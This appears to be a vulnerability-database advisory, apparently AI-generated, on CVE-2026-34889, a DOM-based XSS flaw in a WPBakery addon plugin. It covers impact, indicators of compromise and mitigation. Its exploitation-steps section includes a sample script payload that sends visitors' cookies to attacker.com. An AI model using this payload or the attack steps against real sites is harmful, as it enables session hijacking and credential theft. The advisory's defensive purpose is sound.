CVE-2026-34889
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-34889 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the Ultimate Addons for WPBakery Page Builder WordPress plugin developed by Brainstorm Force. It affects all plugin versions prior to 3.21.4 and was disclosed on April 1, 2026, by Patchstack (credited to researcher "Bonds"). The vulnerability carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, Github Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting) and specifically manifests as DOM-Based XSS, meaning malicious payloads are processed and executed within the browser's DOM rather than being reflected or stored server-side (Github Advisory). Exploitation requires an authenticated user with at least Contributor-level privileges to inject a malicious script, and successful execution additionally requires a victim user to interact with the crafted content (e.g., visiting a page containing the payload) (Patchstack). The attack vector is network-based with low attack complexity, and the scope is changed, indicating the injected script can affect resources beyond the vulnerable component itself.

Impact

Successful exploitation allows authenticated low-privilege users to inject malicious JavaScript into pages rendered by the WPBakery Page Builder, which executes in the browsers of site visitors. This can result in theft of session cookies or credentials, unauthorized actions performed on behalf of affected users, defacement or modification of page content, and redirection to malicious sites. The CVSS scoring reflects low-to-moderate impacts on confidentiality, integrity, and availability, with a changed scope indicating potential cross-component effects (Patchstack, Github Advisory).

Exploitability

As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Feedly). The EPSS score is approximately 0.033% (0.000330), placing it in the 3rd percentile for exploitation likelihood within the next 30 days (Github Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running Ultimate Addons for WPBakery Page Builder versions prior to 3.21.4 using tools like WPScan or by inspecting plugin metadata in publicly accessible readme files.
  2. Obtain low-privilege access: Acquire or register a Contributor-level (or higher) account on the target WordPress site, as the vulnerability requires authenticated access.
  3. Craft malicious payload: Create a WPBakery page element or shortcode input that embeds a DOM-manipulating JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) within a plugin parameter that is insufficiently sanitized.
  4. Publish or share the crafted content: Save or publish the page/post containing the malicious element, or share a link to it with a higher-privileged user (e.g., an administrator).
  5. Trigger victim interaction: Lure a victim user (e.g., an administrator) to visit the page. The browser processes the DOM and executes the injected script in the victim's session.
  6. Achieve objective: The executed script can steal session tokens, perform administrative actions, exfiltrate data, or redirect the victim to attacker-controlled infrastructure (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unusual POST requests to page/post editing endpoints from low-privilege contributor accounts; unexpected JavaScript content in saved post meta or page builder shortcode data.
  • File System: Unexpected modifications to page content or plugin files; presence of obfuscated JavaScript strings in post content stored in the WordPress database (wp_posts table).
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting affected pages; unusual cookie or credential exfiltration traffic patterns.
  • Process/Behavior: Admin accounts performing unexpected actions (e.g., new user creation, plugin installation) that may indicate session hijacking following XSS exploitation (Patchstack).

Mitigation and workarounds

The primary remediation is to update Ultimate Addons for WPBakery Page Builder to version 3.21.4 or later, which contains the fix for this vulnerability (Patchstack). As interim mitigations, site administrators should restrict page-editing privileges to trusted users only, and consider implementing Content Security Policy (CSP) headers to reduce the impact of any XSS exploitation. Patchstack users can enable auto-update for vulnerable plugins to receive protection automatically.

Community reactions

The vulnerability was reported to Patchstack by researcher "Bonds" on February 16, 2026, and publicly disclosed on April 1, 2026, following responsible disclosure practices (Patchstack). Patchstack classified the vulnerability as low priority with no impactful threat observed at the time of publication. No significant broader media coverage or notable researcher commentary beyond the initial advisory has been identified.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-78570CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78568CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78572HIGH8.1
  • kalles-addons
NoNoAug 25, 2026
CVE-2026-78576HIGH7.5
  • readabler
NoYesAug 25, 2026
CVE-2026-76128MEDIUM6.4
  • ecommerce-product-catalog
NoYesAug 25, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management